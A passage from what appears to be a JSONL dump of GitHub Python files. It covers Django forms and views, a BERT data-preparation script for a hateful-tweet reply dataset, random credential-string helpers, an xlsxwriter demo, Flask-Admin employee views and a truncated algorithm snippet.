'data-minimum-input-length': '1'}))\n\n class Meta:\n model = PersonInstitutionRelation\n fields = ('person', 'institution', 'type_of_involvement')\n\n\nclass PersonInstallationRelationForm(ModelForm):\n person = forms.ModelChoiceField(\n queryset=Person.objects.all(),\n widget=PersonWidget(\n attrs={'data-placeholder': 'Select a person',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n installation = forms.ModelChoiceField(\n queryset=Installation.objects.all(),\n widget=InstallationWidget(\n attrs={'data-placeholder': 'Select installation',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = PersonInstallationRelation\n fields = ('person', 'installation', 'type_of_involvement')\n\n\nclass EvidencePersonRelationForm(ModelForm):\n evidence = forms.ModelChoiceField(\n queryset=Evidence.objects.all(),\n widget=EvidenceWidget(\n attrs={'data-placeholder': 'Select evidence',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n person = forms.ModelChoiceField(\n queryset=Person.objects.all(),\n widget=PersonWidget(\n attrs={'data-placeholder': 'Select person',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n page_number = forms.CharField(required=False)\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 4}),\n required=False)\n\n class Meta:\n model = EvidencePersonRelation\n fields = ('evidence', 'person', 'page_number', 'description')\n\n\nclass InstitutionInstallationRelationForm(ModelForm):\n installation = forms.ModelChoiceField(\n queryset=Installation.objects.all(),\n widget=InstallationWidget(\n attrs={'data-placeholder': 'Select installation',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n institution = forms.ModelChoiceField(\n queryset=Institution.objects.all(),\n widget=InstitutionWidget(\n attrs={'data-placeholder': 'Select institution',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = InstitutionInstallationRelation\n fields = ('institution', 'installation', 'type_of_involvement')\n\n\nclass EvidenceInstallationRelationForm(ModelForm):\n evidence = forms.ModelChoiceField(\n queryset=Evidence.objects.all(),\n widget=EvidenceWidget(\n attrs={'data-placeholder': 'Select evidence',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n installation = forms.ModelChoiceField(\n queryset=Installation.objects.all(),\n widget=InstallationWidget(\n attrs={'data-placeholder': 'Select installation',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n page_number = forms.CharField(required=False)\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 4}),\n required=False)\n\n class Meta:\n model = EvidenceInstallationRelation\n fields = ('evidence', 'installation', 'page_number', 'description')\n\n\nclass EvidenceInstitutionRelationForm(ModelForm):\n evidence = forms.ModelChoiceField(\n queryset=Evidence.objects.all(),\n widget=EvidenceWidget(\n attrs={'data-placeholder': 'Select evidence',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n institution = forms.ModelChoiceField(\n queryset=Institution.objects.all(),\n widget=InstitutionWidget(\n attrs={'data-placeholder': 'Select institution',\n 'style': 'width:100%;', 'class': 
'searching',\n 'data-minimum-input-length': '1'}))\n page_number = forms.CharField(required=False)\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 4}),\n required=False)\n\n class Meta:\n model = EvidenceInstitutionRelation\n fields = ('evidence', 'institution', 'page_number', 'description')\n\n\nclass InstallationInstallationRelationForm(ModelForm):\n primary = forms.ModelChoiceField(\n queryset=Installation.objects.all(),\n widget=InstallationWidget(\n attrs={'data-placeholder': 'Select installation',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n secondary = forms.ModelChoiceField(\n queryset=Installation.objects.all(),\n widget=InstallationWidget(\n attrs={'data-placeholder': 'Select installation',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 1}),\n required=False)\n\n class Meta:\n model = InstallationInstallationRelation\n fields = ('primary', 'secondary', 'description')\n\n\nclass InstitutionInstitutionRelationForm(ModelForm):\n primary = forms.ModelChoiceField(\n queryset=Institution.objects.all(),\n widget=InstitutionWidget(\n attrs={'data-placeholder': 'Select institution',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n secondary = forms.ModelChoiceField(\n queryset=Institution.objects.all(),\n widget=InstitutionWidget(\n attrs={'data-placeholder': 'Select institution',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 1}),\n required=False)\n\n class Meta:\n model = InstitutionInstitutionRelation\n fields = ('primary', 'secondary', 'description')\n\n\nclass PersonPersonRelationForm(ModelForm):\n primary = forms.ModelChoiceField(\n queryset=Person.objects.all(),\n widget=PersonWidget(\n attrs={'data-placeholder': 'Select person',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n secondary = forms.ModelChoiceField(\n queryset=Person.objects.all(),\n widget=PersonWidget(\n attrs={'data-placeholder': 'Select person',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 1}),\n required=False)\n\n class Meta:\n model = PersonPersonRelation\n fields = ('primary', 'secondary', 'description')\n\n\n# Formsets\npersoncity_formset = inlineformset_factory(\n Person, CityPersonRelation, form=CityPersonRelationForm, extra=1)\n\npersonneighbourhood_formset = inlineformset_factory(\n Person, NeighbourhoodPersonRelation, form=NeighbourhoodPersonRelationForm, extra=1)\n\npersoninstitution_formset = inlineformset_factory(\n Person, PersonInstitutionRelation, form=PersonInstitutionRelationForm, extra=1)\ninstitutionperson_formset = inlineformset_factory(\n Institution, PersonInstitutionRelation, form=PersonInstitutionRelationForm, extra=1)\n\npersoninstallation_formset = inlineformset_factory(\n Person, PersonInstallationRelation, form=PersonInstallationRelationForm, extra=1)\ninstallationperson_formset = inlineformset_factory(\n Installation, PersonInstallationRelation, form=PersonInstallationRelationForm, extra=1)\n\npersonevidence_formset = inlineformset_factory(\n Person, EvidencePersonRelation, form=EvidencePersonRelationForm, 
extra=1)\nevidenceperson_formset = inlineformset_factory(\n Evidence, EvidencePersonRelation, form=EvidencePersonRelationForm, extra=1)\n\ninstallationinstitution_formset = inlineformset_factory(\n Installation, InstitutionInstallationRelation, form=InstitutionInstallationRelationForm, extra=1)\ninstitutioninstallation_formset = inlineformset_factory(\n Institution, InstitutionInstallationRelation, form=InstitutionInstallationRelationForm, extra=1)\n\ninstallationevidence_formset = inlineformset_factory(\n Installation, EvidenceInstallationRelation, form=EvidenceInstallationRelationForm, extra=1)\nevidenceinstallation_formset = inlineformset_factory(\n Evidence, EvidenceInstallationRelation, form=EvidenceInstallationRelationForm, extra=1)\n\ninstitutionevidence_formset = inlineformset_factory(\n Institution, EvidenceInstitutionRelation, form=EvidenceInstitutionRelationForm, extra=1)\nevidenceinstitution_formset = inlineformset_factory(\n Evidence, EvidenceInstitutionRelation, form=EvidenceInstitutionRelationForm, extra=1)\n\ninstallationinstallation_formset = inlineformset_factory(\n Installation, InstallationInstallationRelation, fk_name='primary', fields='__all__', extra=1,\n form=InstallationInstallationRelationForm)\n\ninstitutioninstitution_formset = inlineformset_factory(\n Institution, InstitutionInstitutionRelation, fk_name='primary', fields='__all__', extra=1,\n form=InstitutionInstitutionRelationForm)\n\npersonperson_formset = inlineformset_factory(\n Person, PersonPersonRelation, fk_name='primary', fields='__all__', extra=1, form=PersonPersonRelationForm)\n\ndattr = {'attrs': {'style': 'width:100%'}}\ndnumber = {'widget': forms.NumberInput(attrs={'style': 'width:100%', 'rows': 3}), 'required': False}\ndchar_required = {'widget': forms.TextInput(**dattr), 'required': True}\n\n\nclass StyleForm(ModelForm):\n name = forms.CharField(**dchar_required)\n stroke_opacity = forms.FloatField(**dnumber)\n stroke_weight = forms.IntegerField(**dnumber)\n fill_opacity = forms.FloatField(**dnumber)\n z_index = forms.FloatField(**dnumber)\n\n class Meta:\n model = Style\n f = 'stroke_weight,stroke_opacity,color,fill_opacity'\n f += ',dashed,name,z_index'\n fields = f.split(',')\n","repo_name":"Kandroodi/WaterSystem","sub_path":"installations/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":33888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"2071922165","text":"import argparse\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom transformers import AutoTokenizer \nimport torch\nfrom torch.utils.data import TensorDataset\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler\nimport os\n\n# Constant seed for reproducibility.\nSEED = 42\nBATCH_SIZE = 16\n\ndef preprocess_dataframe_tweets(df,col='tweet'):\n #remove URL\n df[col + '_proc'] = df[col].str.replace(r'http(\\S)+', r'')\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'http ...', r'')\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'http', r'')\n # remove RT, @\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'(RT|rt)[ ]*@[ ]*[\\S]+',r'')\n df[df[col + '_proc'].str.contains(r'RT[ ]?@')]\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'@[\\S]+',r'')\n #remove non-ascii words and characters\n df[col + '_proc'] = [''.join([i if ord(i) < 128 else '' for i in text]) for text in df[col + '_proc']]\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'_[\\S]?',r'')\n #remove &, < and >\n df[col + 
'_proc'] = df[col + '_proc'].str.replace(r'&?',r'and')\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'<',r'<')\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'>',r'>')\n # remove extra space\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'[ ]{2, }',r' ')\n # insert space between punctuation marks\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'([\\w\\d]+)([^\\w\\d ]+)', r'\\1 \\2')\n df[col + '_proc'] = df[col + '_proc'].str.replace(r'([^\\w\\d ]+)([\\w\\d]+)', r'\\1 \\2')\n # lower case and strip white spaces at both ends\n df[col + '_proc'] = df[col + '_proc'].str.lower()\n df[col + '_proc'] = df[col + '_proc'].str.strip()\n\ndef encode_sentence(s, tokenizer):\n return tokenizer.encode_plus(\n\t\ts, # Sentence to encode.\n\t\tadd_special_tokens = True, # Add '[CLS]' and '[SEP]'\n\t\tmax_length = 128, # Pad & truncate all sentences.\n\t\tpad_to_max_length = True,\n\t\treturn_attention_mask = True, # Construct attn. masks.\n\t\treturn_tensors = 'pt', # Return pytorch tensors.\n\t)\n\ndef bert_encode(df, tokenizer, max_seq_length=512):\n input_ids = []\n attention_masks = []\n for sent in df[['Hateful Tweet', 'Reply Tweet']].values:\n sent = sent[0] + ' [SEP] ' + sent[1]\n encoded_dict = tokenizer.encode_plus(\n\t\t\tsent, # Sentence to encode.\n\t\t\tadd_special_tokens = True, # Add '[CLS]' and '[SEP]'\n\t\t\tmax_length = 128, # Pad & truncate all sentences.\n\t\t\tpad_to_max_length = True,\n\t\t\treturn_attention_mask = True, # Construct attn. masks.\n\t\t\treturn_tensors = 'pt', # Return pytorch tensors.\n\t\t)\n \n # Add the encoded sentence to the list. \n input_ids.append(encoded_dict['input_ids'])\n \n # And its attention mask (simply differentiates padding from non-padding).\n attention_masks.append(encoded_dict['attention_mask'])\n input_ids = torch.cat(input_ids, dim=0)\n attention_masks = torch.cat(attention_masks, dim=0)\n\n inputs = {\n 'input_word_ids': input_ids,\n 'input_mask': attention_masks}\n\n return inputs\n\n\ndef main():\n\tparser = argparse.ArgumentParser(description=__doc__)\n\tparser.add_argument(\"--csv-file\", required=True,\n\t\t\t\t\t\t\t\t\t\t\thelp=\"Location of the data file in a .csv format.\")\n\tparser.add_argument(\"--question\", required=True,\n\t\t\t\t\t\t\t\t\t\t\thelp=\"A number from 1 to 4 indicating the question number.\")\n\tparser.add_argument(\"--model-name\", required=True,\n\t\t\t\t\t\t\t\t\t\t\thelp='Which model to use, either bert or bertweet.')\n\tparser.add_argument(\"--output-dir\", required=False, default=\"./Dataloaders\",\n\t\t\t\t\t\t\t\t\t\t\thelp=\"A directory to save the output files in.\")\n\targs = parser.parse_args()\n\tcsv_file = args.csv_file\n\n\tif int(args.question) not in [1, 2, 3, 4]:\n\t\traise Exception(\"Question number must be in [1, 2, 3, 4].\")\n\telse:\n\t\tQ = \"Q\" + args.question\n\n\tif os.path.isfile(csv_file) :\n\t\tdf = pd.read_csv(csv_file)\n\t\tdataset = df[~df[Q].isnull()]\n\telse:\n\t\traise Exception(f'CSV file \"{csv_file}\" not found.')\n\t\t\n\tif args.model_name.lower() not in [\"bert\", \"bertweet\"]:\n\t\traise Exception(f\"Model name must be either bert or bertweet.\")\n\telse:\n\t\tmodel_name = args.model_name.lower()\n\t\n\toutput_dir = args.output_dir\n\tif not os.path.isdir(output_dir):\n\t\tos.mkdir(output_dir)\n\n\tX_train, X_test, y_train, y_test = train_test_split(\n\t\tdataset[['Hateful Tweet', 'Reply Tweet']], \n\t\tdataset[Q],\n\t\ttest_size=0.2, \n\t\tstratify=dataset[Q],\n\t\trandom_state=SEED\n\t)\n\tX_train, X_val, y_train, y_val = 
train_test_split(\n\t\tX_train, \n\t\ty_train,\n\t\ttest_size=0.1, \n\t\tstratify=y_train,\n\t\trandom_state=SEED\n\t)\n\n\tdf_train = X_train.join(y_train)\n\tdf_val = X_val.join(y_val)\n\tdf_test = X_test.join(y_test)\n\n\tpreprocess_dataframe_tweets(df_train,col='Hateful Tweet')\n\tpreprocess_dataframe_tweets(df_train,col='Reply Tweet')\n\n\tpreprocess_dataframe_tweets(df_val,col='Hateful Tweet')\n\tpreprocess_dataframe_tweets(df_val,col='Reply Tweet')\n\n\tpreprocess_dataframe_tweets(df_test,col='Hateful Tweet')\n\tpreprocess_dataframe_tweets(df_test,col='Reply Tweet')\n\tif model_name == \"bert\":\n\t\ttokenizer = AutoTokenizer.from_pretrained(\"bert-base-uncased\",use_fast=True, normalization=True)\n\telse:\n\t\ttokenizer = AutoTokenizer.from_pretrained(\"vinai/bertweet-base\",use_fast=True, normalization=True)\n\n\ttweet_train = bert_encode(df_train, tokenizer)\n\ttweet_train_labels = df_train[Q].astype(int)\n\ttweet_valid = bert_encode(df_val, tokenizer)\n\ttweet_valid_labels = df_val[Q].astype(int)\n\ttweet_test = bert_encode(df_test, tokenizer)\n\ttweet_test_labels = df_test[Q].astype(int)\n\n\tinput_ids, attention_masks = tweet_train.values()\n\tlabels = tweet_train_labels\n\n\t# Combine the training inputs into a TensorDataset.\n\tinput_ids, attention_masks = tweet_train.values()\n\tlabels = torch.tensor(tweet_train_labels.values,dtype=torch.long)\n\ttrain_dataset = TensorDataset(input_ids, attention_masks, labels)\n\n\t# Create a 90-10 train-validation split.\n\tinput_ids, attention_masks = tweet_valid.values()\n\tlabels = torch.tensor(tweet_valid_labels.values,dtype=torch.long)\n\tval_dataset = TensorDataset(input_ids, attention_masks, labels)\n\n\n\t# Create a 90-10 train-validation split.\n\tinput_ids, attention_masks = tweet_test.values()\n\tlabels = torch.tensor(tweet_test_labels.values,dtype=torch.long)\n\ttest_dataset = TensorDataset(input_ids, attention_masks, labels)\n\n\t# The DataLoader needs to know our batch size for training, so we specify it \n\t# here. For fine-tuning BERT on a specific task, the authors recommend a batch size of 16 or 32.\n\n\t# Create the DataLoaders for our training and validation sets.\n\t# We'll take training samples in random order. 
\n\ttrain_dataloader = DataLoader(\n\t\t\t\ttrain_dataset, # The training samples.\n\t\t\t\tsampler = RandomSampler(train_dataset), # Select batches randomly\n\t\t\t\tbatch_size = BATCH_SIZE # Trains with this batch size.\n\t\t\t)\n\n\t# For validation the order doesn't matter, so we'll just read them sequentially.\n\tvalidation_dataloader = DataLoader(\n\t\t\t\tval_dataset, # The validation samples.\n\t\t\t\tsampler = SequentialSampler(val_dataset), # Pull out batches sequentially.\n\t\t\t\tbatch_size = BATCH_SIZE # Evaluate with this batch size.\n\t\t\t)\n\n\t# For testing the order doesn't matter, so we'll just read them sequentially.\n\ttesting_dataloader = DataLoader(\n\t\t\t\ttest_dataset, # The validation samples.\n\t\t\t\tsampler = SequentialSampler(test_dataset), # Pull out batches sequentially.\n\t\t\t\tbatch_size = BATCH_SIZE # Evaluate with this batch size.\n\t\t\t)\n\n\ttorch.save(train_dataloader, os.path.join(output_dir, 'train.pth'))\n\ttorch.save(validation_dataloader, os.path.join(output_dir, 'valid.pth'))\n\ttorch.save(testing_dataloader, os.path.join(output_dir, 'test.pth'))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"albanyan/hateful-tweets-replies","sub_path":"Code/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":7769,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"14863603667","text":"import random\nimport string\n\n\ndef log_gen():\n lst_1 = [\"Ae\", \"Di\", \"Mo\", \"Fam\", \"Ri\", \"Tr\", \"Sa\"]\n lst_2 = [\"dar\", \"kil\", \"glar\", \"dom\", \"tlar\", \"pyt\", \"ben\", \"sed\", \"grim\"]\n rand_number = random.randint(0, 1)\n if rand_number == 1:\n random_log = f\"{random.choice(lst_1)}{random.choice(lst_2)}{random.randint(1, 100)}\"\n return random_log\n else:\n random_log = f\"{random.choice(lst_1)}{random.choice(lst_2)}\"\n return random_log\n\n\ndef pass_gen():\n result = \"\"\n choices = string.ascii_letters + string.digits + \"!@#$%^&*\"\n for i in range(8):\n result += random.choice(choices)\n return result\n\n\ndef mails_gen(login):\n lst_mails = [\"gmail.com\", \"mail.ru\", \"uk.net\"]\n result_mail = f\"{login}@{random.choice(lst_mails)}\"\n return result_mail\n\n","repo_name":"lipatoS/my_1st_django","sub_path":"app/currency/login_gen.py","file_name":"login_gen.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30869542141","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport xlsxwriter\n\n\n# Create an new Excel file and add a worksheet.\nworkbook = xlsxwriter.Workbook('demo1.xlsx')\nworksheet = workbook.add_worksheet()\n\n# Widen the first column to make the text clearer.\n# 设定第一列(A)宽度为20像素\nworksheet.set_column('A:A', 20)\n\n# Add a bold format to use to highlight cells.\n#bold = workbook.add_format({'bold': True})\n# 设置为粗体\nbold = workbook.add_format()\nbold.set_bold()\n\n# Write some simple text.\n# A1单元格写入 hello\nworksheet.write('A1', 'Hello')\n\n# Text with formatting.\n# A2 单元格写入粗体\nworksheet.write('A2', 'World', bold)\n\n# 写入中文\nworksheet.write('B2', u'中文测试', bold)\n\n# Write some numbers, with row/column notation.\n# 用行列表示法写入32和35.5\n# 行列表示法的单元格下标以0作为起始值,'3,0'等价于'A5'\nworksheet.write(2, 0, 32)\nworksheet.write(3, 0, 35.5)\n\n# 求A3,A4的和,并结果写入A4\nworksheet.write(4, 0, '=SUM(A3:A4)')\n\n# Insert an image.\n# 插入图片\nworksheet.insert_image('B5', 
'img/python-logo.png')\n\nworkbook.close()\n","repo_name":"cyril7/mygit","sub_path":"python/sysadmin/XlsxWriter/xls-manipulate.py","file_name":"xls-manipulate.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18224400989","text":"from django.shortcuts import render, redirect\nfrom .models import Publicacion, Persona , Comment\n#from django.views import generic\nfrom django.utils import timezone\nfrom django.shortcuts import get_object_or_404\n#nuevo\nfrom django.contrib.auth import logout as do_logout\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth.forms import AuthenticationForm, UserCreationForm\nfrom django.contrib.auth import login as do_login\n# add to the top\nfrom mylife.forms import ContactForm, CommentForm\n\nfrom mylife.forms import ComentarioForm\nfrom django.forms import ModelForm\nfrom django.template import RequestContext\n\nfrom django.db import IntegrityError\nfrom django.contrib.auth.decorators import login_required\n\n#def index(request):\n #latest_question_list = Publicacion.objects.all()\n #context = {'latest_question_list': latest_question_list}\n #return render(request, 'mylife/index.html', context)\n\n#class IndexView(generic.ListView):\n #template_name = 'mylife/index.html'\n #context_object_name = 'latest_question_list'\n\ndef index(request):\n posts = Publicacion.objects.filter(fecha_publicacion__lte=timezone.now()).order_by('fecha_publicacion')\n if request.user.is_authenticated:\n return render(request, 'mylife/index.html', {'posts': posts} )\n return redirect(\"/login\")\n \n\n\n \ndef post_detail(request, pk):\n post = get_object_or_404(Publicacion, pk=pk)\n return render(request, 'mylife/post_detail.html', {'post': post})\n\n\n#def image(request):\n#post = Publicacion.objects.all()\n #for mycar in post:\n #MyCar = mycar.mi_foto.url\n #variables = RequestContext(request,{'post':MyCar })\n # return render_to_response('index.html',variables)\n\n\n #def get_queryset(request ):\n #\"\"\"Return the last five published questions.\"\"\"\n # return Publicacion.objects.order_by()\n \n\n#class DetailView(generic.DetailView):\n # model = Publicacion\n #template_name = 'mylife/detalle.html'\n\ndef welcome(request):\n if request.user.is_authenticated: # si estamos identificados devolvemos la portada\n return render(request, \"mylife/index.html\")\n return redirect(\"/login\") # si no redireccionamos al login\n\n\ndef register(request):\n form = UserCreationForm()# Creamos el formulario de autenticación vacío\n form.fields['username'].help_text = None\n form.fields['password1'].help_text = None\n form.fields['password2'].help_text = None\n \n if request.method == \"POST\":\n form = UserCreationForm(data=request.POST)# Añadimos los datos recibidos al formulario\n if form.is_valid(): # Si el formulario es válido...\n user = form.save() # Creamos la nueva cuenta de usuario\n if user is not None: # Si el usuario se crea correctamente\n do_login(request, user) # Hacemos el login manualmente\n return redirect('/')# Y le redireccionamos a la portada\n return render(request, \"mylife/register.html\", {'form': form}) # Si llegamos al final renderizamos el formulario\n\n\ndef login(request):\n form = AuthenticationForm() # creamos el formulario de autentificacion\n if request.method == \"POST\":\n form = AuthenticationForm(data=request.POST)# AÑADIMOS los datos recibidos al form\n if form.is_valid(): # si el form es valido\n username = 
form.cleaned_data['username'] # recuperamos la credenciales validas\n password = form.cleaned_data['password'] # recuperamos la credenciales validas\n user = authenticate(username=username,password=password) #verificamos las credenciales del user\n if user is not None: # si existe un user con ese nombre y password\n do_login(request, user) # hacemos el login manualmente\n return redirect('/')\n\n return render(request, 'mylife/login.html', {'form':form}) # si llegamos al final renderizamos el formulario\n\n\ndef logout(request):\n do_logout(request) #finalizamos la secion\n return redirect('/') #redireccionamos ala portada\n\n\ndef quienessomos(request):\n return render(request, 'mylife/quienessomos.html')\n\n\n\ndef contacto(request):\n form_class = ContactForm\n return render(request, 'mylife/contacto.html', {'form': form_class,})\n\n\n\n\n#formulario = form.save(commit=False)\n\n\n\n\ndef post_new(request):\n if request.method == \"POST\":\n form = ComentarioForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = ComentarioForm()\n return render(request, 'mylife/post_detail.html', {'form': form})\n\n\n\n\ndef post_edit(request, pk):\n post = get_object_or_404(Publicacion, pk=pk)\n if request.method == \"POST\":\n form = ComentarioForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = ComentarioForm(instance=post)\n return render(request, 'mylife/post_edit.html', {'form': form})\n\n\n\n\ndef add_comment_to_post(request, pk):\n post = get_object_or_404(Publicacion, pk=pk)\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = CommentForm()\n return render(request, 'mylife/add_comment_to_post.html', {'form': form} )\n\n\n@login_required\ndef comment_approve(request, pk):\n comment = get_object_or_404(Comment, pk=pk)\n comment.approve()\n return redirect('post_detail', pk=comment.post.pk)\n\n@login_required\ndef comment_remove(request, pk):\n comment = get_object_or_404(Comment, pk=pk)\n comment.delete()\n return redirect('post_detail', pk=comment.post.pk)\n\n\n\n\n\n","repo_name":"mylife-rosario/mylife","sub_path":"sitiomylife/mylife/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33360998795","text":"from api.mysql.controllers.controller import EmployeeAPI, EarlyClockIn\nfrom api.utils.admin_helpers import validate_email\n\nfrom flask_admin import Admin, AdminIndexView, BaseView, expose\nfrom flask import redirect, url_for, request\n# from flask_security import current_user\nfrom flask_admin.contrib.sqla import ModelView\nfrom flask_login import current_user\n\n\nfrom flask_security.forms import LoginForm as OriginalLoginForm\nfrom wtforms import validators\n\n\n\n\nclass MyAdminIndexView(AdminIndexView):\n def is_accessible(self):\n return current_user.is_authenticated and current_user.has_role('admin')\n\n def inaccessible_callback(self, name, **kwargs):\n return redirect(url_for('auth.login', next=request.url))\n # def is_accessible(self):\n # 
return current_user.is_authenticated and current_user.has_role('admin')\n #\n # def inaccessible_callback(self, name, **kwargs):\n # return redirect(url_for('security.login', next=request.url))\n# views_bp = Blueprint('views', __name__)\n# You can customize this class as you like\nclass EmployeeModelView(ModelView):\n def is_accessible(self):\n return current_user.is_authenticated and current_user.has_role('admin')\n\n def inaccessible_callback(self, name, **kwargs):\n return redirect(url_for('auth.login', next=request.url))\n # def is_accessible(self):\n # return current_user.is_authenticated and current_user.has_role('admin')\n # def inaccessible_callback(self, name, **kwargs):\n # return redirect(url_for('security.login', next=request.url))\n column_labels = {\n 'name' : '姓名',\n 'email' : '电子邮件',\n 'position' : '职称',\n 'employee_number' : '员工号码',\n 'create_at' : '到职日',\n 'phone_number' :'电话号码',\n 'gender' :'性别',\n 'department' :'部门',\n 'birth_date':'出生年月日',\n 'address' : '住址',\n 'salary' : '薪资',\n 'nationality' : '国籍'\n }\n form_excluded_columns = ['create_at']\n # 显示在列表视图中的字段\n column_list = ('employee_number','name', 'email','phone_number','gender','birth_date', 'position','department','address','nationality','create_at')\n column_editable_list = ('name', 'email', 'position')\n # 可以搜索的字段\n column_searchable_list = ('employee_number','name', 'email')\n\n # 可以过滤的字段\n column_filters = ('position',)\n form_args = {\n 'email': {\n 'validators': [validate_email],\n }\n }\n form_choices = {\n 'gender': [\n ('male', '男'),\n ('female', '女')\n ],\n 'department': [\n ('HR', '人力资源'),\n ('Engineering', '工程'),\n ('Marketing', '市场营销'),\n # 更多部门\n ],\n 'nationality': [\n ('US', '美国'),\n ('UK', '英国'),\n ('CN', '中国'),\n ('TW', '台湾'),\n ('other', '其他'),\n # ... 其他国籍\n ]\n }\n column_descriptions = {\n 'email': '用于登录和接收通知的电子邮件地址。',\n 'salary': '月薪。'\n }\n column_sortable_list = ('employee_number', 'name', 'email', 'create_at')\n\n column_formatters = {\n 'birth_date': lambda v, c, m, p: m.birth_date.strftime('%Y-%m-%d') if m.birth_date else '',\n }\n\n\n\n\nclass EmployeeRecordView(BaseView):\n @expose('/')\n def index(self):\n api = EmployeeAPI()\n employee_data = api.get()\n return self.render('admin/employee_record.html', employee_data=employee_data)\n\nclass EarlyClockView(BaseView):\n @expose('/')\n def index(self):\n api = EarlyClockIn()\n clock_data = api.get()\n return self.render('admin/early_clock.html', clock_data=clock_data)\n\n# column_labels:用于自订字段标签的显示。您可以使用这个属性来替换字段名称为更加易读的标签。\n#\n# column_editable_list:用于指定哪些字段可以在列表页面中直接编辑。将字段名称添加到这个列表中,将使它们在列表页面中变成可编辑的字段。\n#\n# column_searchable_list:用于指定可以进行搜寻的字段。将字段名称添加到这个列表中,将允许您在列表页面上使用搜索框来搜寻这些字段的内容。\n#\n# column_sortable_list:用于指定可以进行排序的字段。将字段名称添加到这个列表中,将允许您在列表页面上按这些字段进行排序。\n#\n# column_default_sort:用于设定预设的排序方式。可以设定为元组,包含要排序的字段名称和排序顺序('asc' 或 'desc')。\n#\n# column_formatters:用于自订字段在列表页面中的显示格式。可以使用这个属性来对特定字段的值进行格式化处理。\n#\n# column_descriptions:用于提供字段的描述信息,将显示为字段标签的 tooltip。\n#\n# form_columns:用于指定在新增和编辑页面中显示的字段。默认情况下,所有字段都会显示,但您可以使用这个属性仅显示特定的字段。\n#\n# column_choices:用于定义字段的选项列表,使它们在列表页面中以人类可读的值显示。\n# @views_bp.route('/')\n# def index():\n# return render_template('indexbak.html')\n","repo_name":"RuiZheYang1991/Clock-In-System","sub_path":"app/api/admin/admin_view.py","file_name":"admin_view.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8802240214","text":"import collections\n\n\ndef numSmallerByFrequency(queries, words):\n def 
